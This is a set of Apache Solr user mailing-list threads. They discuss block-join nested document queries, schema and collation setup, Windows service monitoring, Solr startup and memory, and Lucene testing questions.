On Sun, Jul 22, 2018 at 10:25 AM TK Solr  wrote:

https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser 



talks about {!parent which=} , which returns parent docs only, and
{!child of=} ,
which
returns child docs only.

Is there a way to retrieve the matched documents in the original, nested
form?
Using the sample document, is there way to get:


1
Solr has block join support
parentDocument

2
SolrCloud supports it too!



rather than just the parent or the child docs?









Re: How to retrieve nested documents (parents and their children together) ?

2018-07-24 Thread TK Solr

Thank you. I'll try the child doc transformer.

On a related question, if I delete a parent document, will its children be 
deleted also? Or do I have to have a parent_id field in each child so that the 
child docs can be deleted?



On 7/22/18 10:05 AM, Mikhail Khludnev wrote:

Hello,
Check [child]
https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory
or [subquery].
Although, it's worth to put reference to it somewhere in blockjoin
qparsers.
Documentation patches are welcome.


On Sun, Jul 22, 2018 at 10:25 AM TK Solr  wrote:


https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser

talks about {!parent which=} , which returns parent docs only, and
{!child of=} ,
which
returns child docs only.

Is there a way to retrieve the matched documents in the original, nested
form?
Using the sample document, is there way to get:


1
Solr has block join support
parentDocument

2
SolrCloud supports it too!



rather than just the parent or the child docs?







How to retrieve nested documents (parents and their children together) ?

2018-07-22 Thread TK Solr

https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser

talks about {!parent which=} docs>, which returns parent docs only, and
{!child of=} , which 
returns child docs only.


Is there a way to retrieve the matched documents in the original, nested form? 
Using the sample document, is there way to get:



  1
  Solr has block join support
  parentDocument
  
  2
  SolrCloud supports it too!
  


rather than just the parent or the child docs?




Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-08 Thread TK Solr

Mikhail,

Actually, your suggestion worked! I was making a typo on the field name. Thank 
you very much!


TK

p.s. I have found a mention of _query_ "magic field" in the Solr Reference Guide


On 7/8/18 11:04 AM, TK Solr wrote:

Thank you.

This is more promising because I see the second clause in parsedquery. But it 
is hitting zero document.


The debug query output looks like this. explain is empty:


rawquerystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre 
AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"querystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre 
AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"parsedquery":"+AllParentsAware(ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama))) +AllParentsAware(ToParentBlockJoinQuery 
(+(+attrname:country +attrvalue:usa)))",
"parsedquery_toString":"+ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama)) +ToParentBlockJoinQuery (+(+attrname:country 
+attrvalue:usa))",

"explain":{},
"QParser":"LuceneQParser",
"timing":{...}


Could you tell me what _query_ does?


On 7/4/18 10:25 PM, Mikhail Khludnev wrote:

agh... It's my pet peeve.
what about
q= {!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}
AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}

^leading space
q=_query_:{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} AND _query_:{!parent which="isParent:true"
v='attrname:country
AND attrvalue:USA'}
q=+{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} +{!parent
which="isParent:true" v='attrname:country AND attrvalue:USA'}
Beware of escape encoding. it might require to replace + to %2b.
Post debug=query response here.

On Tue, Jul 3, 2018 at 9:25 PM TK Solr  wrote:


Thank you, Mikhail. But this didn't work. The first {!parent which='...'
v='...'} alone works. But the second {!parent ...} clause is completely
ignored.
In fact, if I turn on debugQuery, rawquerystring and querystring have the
second
query but parsedquery and parsedquery_toString only have the first query.
BTW,
does is the v parameter works in place of the query following {!parsername
} for
any parser?


On 7/3/18 12:42 PM, Mikhail Khludnev wrote:

q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}

AND

{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}








Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-08 Thread TK Solr

Thank you.

This is more promising because I see the second clause in parsedquery. But it is 
hitting zero document.


The debug query output looks like this. explain is empty:


rawquerystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre AND 
attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"querystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre 
AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"parsedquery":"+AllParentsAware(ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama))) +AllParentsAware(ToParentBlockJoinQuery (+(+attrname:country 
+attrvalue:usa)))",
"parsedquery_toString":"+ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama)) +ToParentBlockJoinQuery (+(+attrname:country +attrvalue:usa))",

"explain":{},
"QParser":"LuceneQParser",
"timing":{...}


Could you tell me what _query_ does?


On 7/4/18 10:25 PM, Mikhail Khludnev wrote:

agh... It's my pet peeve.
what about
q= {!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}
AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}

^leading space
q=_query_:{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} AND _query_:{!parent which="isParent:true"
v='attrname:country
AND attrvalue:USA'}
q=+{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} +{!parent
which="isParent:true" v='attrname:country AND attrvalue:USA'}
Beware of escape encoding. it might require to replace + to %2b.
Post debug=query response here.

On Tue, Jul 3, 2018 at 9:25 PM TK Solr  wrote:


Thank you, Mikhail. But this didn't work. The first {!parent which='...'
v='...'} alone works. But the second {!parent ...} clause is completely
ignored.
In fact, if I turn on debugQuery, rawquerystring and querystring have the
second
query but parsedquery and parsedquery_toString only have the first query.
BTW,
does is the v parameter works in place of the query following {!parsername
} for
any parser?


On 7/3/18 12:42 PM, Mikhail Khludnev wrote:

q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}

AND

{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}






Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-03 Thread TK Solr
Thank you, Mikhail. But this didn't work. The first {!parent which='...' 
v='...'} alone works. But the second {!parent ...} clause is completely ignored.
In fact, if I turn on debugQuery, rawquerystring and querystring have the second 
query but parsedquery and parsedquery_toString only have the first query. BTW, 
does is the v parameter works in place of the query following {!parsername } for 
any parser?



On 7/3/18 12:42 PM, Mikhail Khludnev wrote:

q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND

{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}




Parent-child query; subqueries on child docs of the same set of fields

2018-07-03 Thread TK Solr

I have a document with child documents like:

  
maindoc_121
true
child_121_1
genre
drama


child_121_2
country
USA



The child documents have the same set of fields.

I can write a query that has a child which has attrname=genre and 
attrvalue=drama as

q={!parent which="isParent:true"} attrname:genre AND attrvalue:drama


But if I want to add another condition that the parent must have another child 
that have certain values, what do I do?


q={!parent which="isParent:true"} attrname:genre AND attrvalue:drama AND 
attrname:country AND attrvalue:USA


would mean a query of parent where one of the children must match. I want a 
parent that have two children, one is matched by one sub-query, and another is 
matched by another sub-query.


TK




Re: Windows monitoring software for Solr recommendation

2018-06-05 Thread TK Solr

On 6/5/18 10:31 AM, Christopher Schultz wrote:


How about Apache procrun/commons-daemon?

https://commons.apache.org/proper/commons-daemon/procrun.html

Thank you, I'll take a look.

On 6/5/18 1:51 PM, Shawn Heisey wrote:

The best bet for
an easy service install is probably NSSM.  It's got a name that some
people hate, but a lot of people use it successfully.

https://nssm.cc/

Thank you, I'll take a look at this one too.


You mentioned looking at a GC log.  Can you provide that entire log for
analysis?
Thank you for your offer to help. But I don't really think this is a memory 
related issue.
I visualized the GC log with GCMV (GCVM?) and the graph shows Solr was using 
less than half of the heap space at the peak.

This Solr doesn't get much query traffic and no indexing was running.
It's really a sudden death of JVM with no trace.

The only concern I have is that the Solr config files are that of Solr 5.x and 
they just upgraded to Solr 6.6. But I understand Solr 6 supports Solr 5 
compatible mode. Has there been any issue in the compatibility mode?


TK





Windows monitoring software for Solr recommendation

2018-06-05 Thread TK Solr
My client's Solr 6.6 running on a Windows server is mysteriously crashing 
without any JVM crash log. No unusual activities recorded in solr.log. GC log 
does not indicate the OOM situation. It's a simple single-core, single node 
deployment (no solrCloud). It has very light load. No indexing activities were 
running near the crash time.


After exhausting all possibilities (suggestions are welcome), I'd like to 
recommend to install some monitoring software but I couldn't find one that works 
on Windows for a Java based software. (Some I found can monitor only EXEs. Since 
all java software shares the same EXE, java.EXE, those won't work.) Can anyone 
recommend some? They don't need to be free but can't be very expensive since 
it's a very lightly used Solr system. Perhaps less than $500?


TK




Re: Run solr server using Java program

2018-04-21 Thread TK Solr
The solr.cmd starts Solr by running java -jar start.jar, which has the MANIFEST 
file that tells the java command that it's main class is 
org.eclipse.jetty.start.Main.


So, I would think your Java program should be able to start Solr (jetty, really) 
by calling org.exlipse.jetty.start.Main.main(argv).


But a big question is why you'd like to do that.

TK

On 4/18/18 7:34 AM, rameshkjes wrote:

Hi guys,

I am able to run the solr instance, add the core and import the data
manually. But I want to do everything with the help of Java program, I
searched a lot but did not find any relevant answer.

In order to run the solr server, i execute following command inside
directory: D:\software\solr-7.2.0\solr-7.2.0\bin

 " /solr.cmd -s "C:\Users\lucky\github\myproject\solr-config"/  "

After that I access to " /http://localhost:8983/solr// "

and select the name of core which is "demo"

and then I select/ dataimport/ tab and "/execute/" to import documents.

First thing what i tried is to run the solr server using Java program, which
I am unable to do. Could anyone please with that?

I am using Solr 7.2.0

Thanks



--
Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html





Minimum memory requirement

2018-01-31 Thread TK Solr
On my AWS t2.micro instance, which only has 1 GB memory, I installed Solr (4.7.1 
- please don't ask) and tried to run it in sample directory as java -jar 
start.jar. It exited shortly due to lack of memory.


How much memory does Solr require to run, with empty core?

TK




literal.* use in posting PDF files

2018-01-30 Thread TK Solr
I have a schema.xml defined to require two fields, "id" and "libDocumentID". 
solrconfig.xml is the standard one.


Using curl, I tried posting a PDF file like this:

curl 
'http://localhost:8983/solr/update/extract?literal.id=foodf=foo=true' 
-F "myfile=@foo.pdf"


but I got:

[doc=foo.pdf] missing required field: 
libDocumentID400


Can I specify more than one litera.name=value ? Do I have to define 
literal.libDocumentID in solrconfig.xml?


I'm using Solr 5.3.1 (please don't ask...).

TK




Bitnami, or other Solr on AWS recommendations?

2018-01-26 Thread TK Solr
If I want to deploy Solr on AWS, do people recommend using the prepackaged 
Bitnami Solr image? Or is it better to install Solr manually on a computer 
instance? Or are there a better way?


TK




Re: Extended characters

2017-10-29 Thread TK Solr

I think you can use ASCIIFoldingFIlter

http://lucene.apache.org/core/6_2_0/analyzers-common/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilter.html

by inserting its factory in your schema.

http://lucene.apache.org/core/6_2_0/analyzers-common/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilterFactory.html

I would suggest making a separate field for this so that exact match can be 
boosted.

On 10/29/17 10:56 AM, Robert Brown wrote:

Hi,

I have a text field in my index containing extended characters, which I'd like 
to match against when searching without the extended characters.


e.g.  field contains "Ensō" which I want to match when searching for just 
"enso".

My current config for that field (type) is given below:


autoGeneratePhraseQueries="true">






synonyms="index_synonyms.txt" ignoreCase="true" expand="true" />



words="lang/stopwords_en.txt" />




















words="lang/stopwords_en.txt" />





















Kuro


Re: Where is schema.xml ?

2015-06-17 Thread TK Solr

On 6/17/15, 2:35 PM, Upayavira wrote:

Do you have a managed-schema file, or such?

You may have used the configs that have a managed schema, i.e. one that
allows you to change the schema via HTTP.
I do see a file named managed-schema without .xml extension in the conf 
directory.

Its content does look like a schema.xml file.
Is this an initial content of in-memory schema, and schema API updates the 
schema dynamically?





Where is schema.xml ?

2015-06-17 Thread TK Solr
With Solr 5.2.0, I ran:
bin/solr create -c foo
This created solrconfig.xml in server/solr/foo/conf directory.
Other configuration files such as synonyms.txt are found in this directory too.

But I don't see schema.xml. Why is schema.xml handled differently?

I am guessing
server/solr/configsets/sample_techproducts_configs/conf/schema.xml
is used by the foo core because it knows about the cat field.
Is the template files in sample_techproducts_configs considered standard?

TK



Re: YAJar

2015-06-08 Thread TK Solr

Maybe maven shade can help your situation ?
https://maven.apache.org/plugins/maven-shade-plugin/
http://stackoverflow.com/questions/13620281/what-is-the-maven-shade-plugin-used-for-and-why-would-you-want-to-relocate-java

Create a self-contained jar with guava package renamed.
Not very pretty but it should work.

On 5/25/15, 9:14 PM, Robust Links wrote:

I am stuck in Yet Another Jarmagedon of SOLR. this is a basic question. i
noticed solr 5.0 is using guava 14.0.1. My app needs guava 18.0. What is
the pattern to override a jar version uploaded into jetty?

I am using maven, and solr is being started the old way

java -jar start.jar
-Dsolr.solr.home=...
-Djetty.home=...

I tried to edit jetty's start.config (then run java
-DSTART=/my/dir/start.config
-jar start.jar) but got no where...

any help would be much appreciated

Peyman





Re: [solr 5.1] Looking for full text + collation search field

2015-05-29 Thread TK Solr


On 5/21/15, 5:19 AM, Björn Keil wrote:

Thanks for the advice. I have tried the field type and it seems to do what it 
is supposed to in combination with a lower case filter.

However, that raises another slight problem:

German umlauts are supposed to be treated slightly different for the purpose of searching than for sorting. For sorting 
a normal ICUCollationField with standard rules should suffice*, for the purpose of searching I cannot just replace an 
ü with a u, ü is supposed to equal ue, or, in terms of 
RuleBasedCollators, there is a secondary difference.


I haven't used this personally but GermanNormalizationFilter seems to do the job
https://lucene.apache.org/core/5_1_0/analyzers-common/org/apache/lucene/analysis/de/GermanNormalizationFilter.html






Re: solr 5.x on glassfish/tomcat instead of jetty

2015-05-22 Thread TK Solr


On 5/21/15, 5:26 AM, Steven White wrote:

Hi TK,

Can you share the thread you found on this WAR topic?


Steve,
Actually, that was my mistake.  I still don't know why WARs are bad.

In the thread Solr 5.0, Jetty and WAR, which you started and are familiar 
with,
https://wiki.apache.org/solr/WhyNoWar
was mentioned. So I thought that's it!
But it turned out this wiki page was a blank page.

TK



Re: solr 5.x on glassfish/tomcat instead of jetty

2015-05-20 Thread TK Solr

On 5/20/15, 8:21 AM, Shawn Heisey wrote:
As of right now, there is still a .war file. Look in the server/webapps 
directory for the .war, server/lib/ext for logging jars, and server/resources 
for the logging configuration. Consult your container's documentation to learn 
where to place these things. At some point in the future, such deployments 
will no longer be possible,
While we are still at this subject, I have been aware there has been an anti-WAR 
movement in the tech but I don't quite understand where this movement is coming 
from.  Can someone point me to some website summarizing why WARs are bad?


Thanks.



Re: solr 5.x on glassfish/tomcat instead of jetty

2015-05-20 Thread TK Solr

Never mind. I found that thread. Sorry for the noise.

On 5/20/15, 5:56 PM, TK Solr wrote:

On 5/20/15, 8:21 AM, Shawn Heisey wrote:
As of right now, there is still a .war file. Look in the server/webapps 
directory for the .war, server/lib/ext for logging jars, and server/resources 
for the logging configuration. Consult your container's documentation to 
learn where to place these things. At some point in the future, such 
deployments will no longer be possible,
While we are still at this subject, I have been aware there has been an 
anti-WAR movement in the tech but I don't quite understand where this movement 
is coming from.  Can someone point me to some website summarizing why WARs are 
bad?


Thanks.





Re: Solr Multilingual Indexing with one field- Guidance

2015-05-12 Thread TK Solr


On 5/7/15, 11:23 AM, Kuntal Ganguly wrote:

1) Is this a correct approach to do it? Or i'm missing something?

Does the user wants to see the documents that he/she doesn't understand?
The words such as doctor, taxi, etc. are common among many languages in 
Europe.
Would the Spanish user wants to see English documents?
Of course this issue can be worked-around by having a separate language field.

How do you handle word collision among languages ?
kind in German means child in English. If a German user search for articles
about children, they will find lots of unrelated English
articles about someone being kind.
This one too can be worked-around by having a language field.

By default, Solr/Lucene hits are sort by the relevancy scores and
the score calculation uses IDF. If a search term appears in many documents,
the score is low. Because virtually all German documents have die, the 
particle,
the score of the English word die will be low also.


2) Can you give me an example where there will be problem with this above
new field type? A use-case/scenario with example will be very helpful.


If you have lots of Japanese documents indexed, try searching 京都 (Kyoto).
You will find many documents about Tokyo (東京) because the government
of the metropolitan Tokyo area is spelled as 東京都 = Tokyo Capital, which
generates two bigrams, 東京 and 京都.

Kuro





Lucene test framework documentation?

2015-01-08 Thread TK Solr
Is there any good document about Lucene Test Framework?
I can only find API docs.
Mimicking the unit test I've found in Lucene trunk, I tried to write
a unit test that tests a TokenFilter I am writing. But it is failing
with an error message like:
java.lang.AssertionError: close() called in wrong state: SETREADER
at 
__randomizedtesting.SeedInfo.seed([2899FF2F02A64CCB:47B7F94117CE7067]:0)
at 
org.apache.lucene.analysis.MockTokenizer.close(MockTokenizer.java:261)
at org.apache.lucene.analysis.TokenFilter.close(TokenFilter.java:58)

During a few round of try and error, I got an error message that the Test
Framework
JAR has to be before Lucene Core. And the above stack trace indicates
that the Test Framework has its own Analyzer implementation, and it has
a certain assumption but it is not clear what the assumption is.

This exception was thrown from one of these lines, I believe:
TokenStream ts = deuAna.tokenStream(text, new
StringReader(testText));
TokenStreamToDot tstd = new TokenStreamToDot(testText, ts, new
PrintWriter(System.out));
ts.close();

(I'm not too sure what TokenStreamToDot is about. I was hoping it would
dump a token stream.)

Kuro